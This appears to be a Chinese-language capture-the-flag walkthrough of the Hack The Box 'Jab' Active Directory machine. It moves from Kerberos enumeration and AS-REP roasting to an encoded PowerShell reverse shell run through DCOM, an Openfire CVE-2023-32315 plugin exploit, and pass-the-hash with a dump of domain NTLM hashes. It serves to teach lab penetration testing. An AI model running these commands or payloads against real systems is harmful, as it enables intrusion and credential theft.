扫描靶机
nmap 10.129.96.212
扫描出了域名,dc,其中里面还有5222端口,这是xmpp的端口,说明跟xmpp有关,直接使用kernrute枚举用户
./kerbrute_linux_arm64 userenum --dc dc01.jab.htb -d jab.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
因为太多了,直接使用那个字典,使用impacket-GetNPUsers枚举用户hash,然后使用grep工具过滤无效信息
impacket-GetNPUsers jab.htb/ -usersfile /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -request 2>&1 | grep -v "KDC_ERR_C_PRINCIPAL_UNKNOWN"
过了很多一段时间都无法枚举出来,那就换一条思路,从xmpp下手,先安装pidgin,然后打开
填写好后,然后确信信息,然后直接登陆,点击上面的Accounts,登陆刚刚新建的账户
登陆进去后还是点Accounts,找到自己的按钮,选search for users
这样就得到一个用户列表
接下来如何导出,可以使用日志的形式,先在终端输入这段命令监听
pidgin -d > output.log输入后,他会要求你重新登陆刚刚的用户,然后重复刚刚打开搜索用户列表的动作,搜索完后退出,打开日志
成功的监听到了用户,使用grep命令过滤无用的信息
grep -oP '<value>K[^<]+@jab.htb(?=</value>)' output.log | sed 's/@jab.htb//g' | sort | uniq > cxk.lst
然后使用impacket-GetNPUsers进行攻击
impacket-GetNPUsers jab.htb/ -usersfile cxk.lst -request 2>&1 | grep -v "UF_DONT_REQUIRE_PREAUTH set"
成功的跑出了三条hash
[email protected]:8d50a8add95432f31b27107c821c71eb$42758c86039558f37b69a9a637017ffabbfe42f9a697fce3c094a9a86727a0236bf6bb0d1f9cd3826551c609535d63390dd9b864c2047f8cf073e5362050d1b75983da9e285512a832771c75ab8abb2186fc18a1d5b50e737ec57a35e47aa9bb6fb0acef5345f0a261c66ba84ac4ed11a9eb59b75f046dd55c7a92eb00391c4918ca09531fd7d0c13c49fe8045efc74f8de48c5d0a8133ebe3ca0431e8b5b77ac1ea8c96f9f9b3d105500918ae425b1375b658491f08e8f9b671c9e05d26f22fd07a0ced9320c6d190ddbd52edb7f04aca44d0c02d91c4441a8015f5c0cb31894c7d[email protected]:2dff56954a127115fecd635383212ed9$16d8ee050747a1534c332f50f399063fd58abcc0653c7bc7e44f0203ba6cc13f18b6da4d6d725bc87afedee527a6d937d34b327e22d5f4f1e2b8ca3eab6def15aafe291ecc024e32860295976f7421ca222b273721c9723c7ffbe1594dedda82b176e7fe1a3db5cb7db25bdd069e0f3fa0168e13fe80543e4e5f00809d53a0aa6556b717549e26de0cfc8f9c6850b55acdeeec911d5dc40e965db21eeffbdbde70e8377209813de2d8c7ffc4d758957ee10aa94811547219709f1e07b52022a2c5c7d52df7ca42619ab09a97c56ff737c08a79593d806d18f1647cfb4db10122bae0[email protected]:76b42e06a561184abe1aa80b9556d281$8402898f533173195cfa39bbd522929791e52a2f98321f8d3d04562e4b2f5b8b90cb8a2e8b8bb3eb197276c47e0f15f6e50ba86c6df1c9d51f1471f5ecdde2d4374a6a0c229456ce45f17661e711b56dbae7e661a6b22a1e2e432992d57bbb2e822e15e20d776ce886b8646492f0121d399f26376a66872fe74ec8a3e39c8329611b28c258102da5ea39f34baccb3fb7a8b854e64a641ba17bcdda74ce18e39356fe773b4f0efbb64e30f61aec9c52136603c690bc16556d6ca3890304abf1ff395e62d8e20f38a43681a11610daa56e606abf6d3e36f4ce08ac7fc3a72821b4d1ac
这三条只有一条有密码,直接使用john破解(是jmontgomery用户)
john --wordlist=/home/ioi/rockyou.txt jmontgomer
成功爆破出密码Midnight_121,然后用来登陆一下xmpp
登陆后点击tools那里,然后找到room list,搜索房间
点击进去后可以看到一个pentest2023的房间,进去可以看到一个破解过程
成功拿到了用户svc_openfire,密码是!@#$%^&*(1qazxsw
hashcat (v6.1.1) starting...<SNIP>$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$de17a01e2449626571bd9416dd4e3d46$4fea18693e1cb97f3e096288a76204437f115fe49b9611e339154e0effb1d0fcccfbbbb219da829b0ac70e8420f2f35a4f315c5c6f1d4ad3092e14ccd506e9a3bd3d20854ec73e62859cd68a7e6169f3c0b5ab82064b04df4ff7583ef18bbd42ac529a5747102c2924d1a76703a30908f5ad41423b2fff5e6c03d3df6c0635a41bea1aca3e15986639c758eef30b74498a184380411e207e5f3afef185eaf605f543c436cd155823b7a7870a3d5acd0b785f999facd8b7ffdafe6e0410af26efc42417d402f2819d03b3730203b59c21b0434e2e0e7a97ed09e3901f523ba52fe9d3ee7f4203de9e857761fbcb417d047765a5a01e71aff732e5d5d114f0b58a8a0df4ca7e1ff5a88c532f5cf33f2e01986ac44a353c0142b0360e1b839bb6889a54fbd9c549da23fb05193a4bfba179336e7dd69380bc4f9c3c00324e42043ee54b3017a913f84a20894e145b23b440aff9c524efb7957dee89b1e7b735db292ca5cb32cf024e9b8f5546c33caa36f5370db61a9a3facb473e741c61ec7dbee7420c188e31b0d920f06b7ffc1cb86ace5db0f9eeaf8c13bcca743b6bf8b2ece99dd58aff354f5b4a78ffcd9ad69ad8e7812a2952806feb9b411fe53774f92f9e8889380dddcb59de09320094b751a0c938ecc762cbd5d57d4e0c3d660e88545cc96e324a6fef226bc62e2bb31897670929571cd728b43647c03e44867b148428c9dc917f1dc4a0331517b65aa52221fcfe9499017ab4e6216ced3db5837d10ad0d15e07679b56c6a68a97c1e851238cef84a78754ff5c08d31895f0066b727449575a1187b19ad8604d583ae07694238bae2d4839fb20830f77fffb39f9d6a38c1c0d524130a6307125509422498f6c64adc030bfcf616c4c0d3e0fa76dcde0dfc5c94a4cb07ccf4cac941755cfdd1ed94e37d90bd1b612fee2ced175aa0e01f2919e31614f72c1ff7316be4ee71e80e0626b787c9f017504fa717b03c94f38fe9d682542d3d7edaff777a8b2d3163bc83c5143dc680c7819f405ec207b7bec51dabcec4896e110eb4ed0273dd26c82fc54bb2b5a1294cb7f3b654a13b4530bc186ff7fe3ab5a802c7c91e664144f92f438aecf9f814f73ed556dac403daaefcc7081957177d16c1087f058323f7aa3dfecfa024cc842aa3c8ef82213ad4acb89b88fc7d1f68338e8127644cfe101bf93b18ec0da457c9136e3d0efa0d094994e1591ecc4:!@#$%^&*(1qazxswSession..........: hashcatStatus...........: CrackedHash.Name........: Kerberos 5, etype 23, TGS-REPHash.Target......: $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openf...91ecc4Time.Started.....: Fri Oct 27 15:30:12 2023 (17 secs)Time.Estimated...: Fri Oct 27 15:30:29 2023 (0 secs)Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)Guess.Queue......: 1/1 (100.00%)Speed.#1.........: 873.9 kH/s (10.16ms) @ Accel:64 Loops:1 Thr:64 Vec:8Recovered........: 1/1 (100.00%) DigestsProgress.........: 14344385/14344385 (100.00%)Rejected.........: 0/14344385 (0.00%)Restore.Point....: 14336000/14344385 (99.94%)Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1Candidates.#1....: $HEX[2321686f74746965] -> $HEX[042a0337c2a156616d6f732103]
尝试用来登陆winrm,发现无法登陆
但是可以使用bloodhound-python来拿到AD信息
bloodhound-python -c ALL -u svc_openfire -p '!@#$%^&*(1qazxsw' -d jab.htb -dc dc01.jab.htb -ns 10.129.97.235
从上面可以分析,svc_openfire用户指着dc01.jab.htb并且有ExecuteDCOM的属性,这说明了SVC_OPENFIRE账户具有在 DC01.JAB.HTB 上执行DCOM(分布式组件对象模型)对象的权限,就是可以使用impacket-dcomexec工具来进行反弹
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA5ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -silentcommand
成功拿到shell,然后上传msf的exe,拿个会话,方便
可以直接拿user flag,然后输入netstat命令查看后台端口
可以看到有个9090端口有点可疑,直接将它代理出来,这次使用chisel工具
然后打开端口
从上面可以分析,这是一个基于Java的实时协作(RTC)服务器,专为即时通讯(IM)和群组聊天用的,刚刚出现了xmpp聊天,就是该系统提供的支持,然而下面出现了4.7.5,说明了该版本是4.7.5,在网上可以寻找到该版本的poc,可以参考这篇文章
https://vulncheck.com/blog/openfire-cve-2023-32315
https://github.com/miko550/CVE-2023-32315
使用svc用户登录该网站
登陆进去后选择Plugins那里,上传插件
上传后在地址输入插件的地址
直接反弹一个交互,会有个密码,密码是上传后会在插件那里显示出来
然后选择系统命令格式
输入whoami得知是system账户了,直接输入之前在svc的马子,得到一个会话
成功拿到两个flag
evil-winrm -i 10.10.11.4 -u Administrator -H b1622aacbe4e96bda28831e653ba288c
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b1622aacbe4e96bda28831e653ba288c:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:365e7cebda9457d8bea70f9428b57804:::svc_openfire:1104:aad3b435b51404eeaad3b435b51404ee:90526decfce7e6ea6769f09ac96505e5:::svc_ldap:1105:aad3b435b51404eeaad3b435b51404ee:e4a9046513c354bfca986ccbf1df96d6:::avazquez:1718:aad3b435b51404eeaad3b435b51404ee:762cbc5ea2edfca03767427b2f2a909f:::pfalcon:1719:aad3b435b51404eeaad3b435b51404ee:f8e656de86b8b13244e7c879d8177539:::fanthony:1720:aad3b435b51404eeaad3b435b51404ee:9827f62cf27fe221b4e89f7519a2092a:::wdillard:1721:aad3b435b51404eeaad3b435b51404ee:69ada25bbb693f9a85cd5f176948b0d5:::lbradford:1722:aad3b435b51404eeaad3b435b51404ee:0717dbc7b0e91125777d3ff4f3c00533:::sgage:1723:aad3b435b51404eeaad3b435b51404ee:31501a94e6027b74a5710c90d1c7f3b9:::asanchez:1724:aad3b435b51404eeaad3b435b51404ee:c6885c0fa57ec94542d362cf7dc2d541:::dbranch:1725:aad3b435b51404eeaad3b435b51404ee:a87c92932b0ef15f6c9c39d6406c3a75:::ccruz:1726:aad3b435b51404eeaad3b435b51404ee:a9be3a88067ed776d0e2cf4ccde8ec8f:::njohnson:1727:aad3b435b51404eeaad3b435b51404ee:1b2a9f3b6d785e695aadfe3485a2601f:::mholliday:1728:aad3b435b51404eeaad3b435b51404ee:a87c92932b0ef15f6c9c39d6406c3a75:::mshoemaker:1729:aad3b435b51404eeaad3b435b51404ee:c15d04d9a989b3c9f1d2db979ffa325f:::aslater:1730:aad3b435b51404eeaad3b435b51404ee:e7d0a88542cb44ab48e5a89d864f8146:::........
原文始发于微信公众号(Jiyou too beautiful):HTB-Jab笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论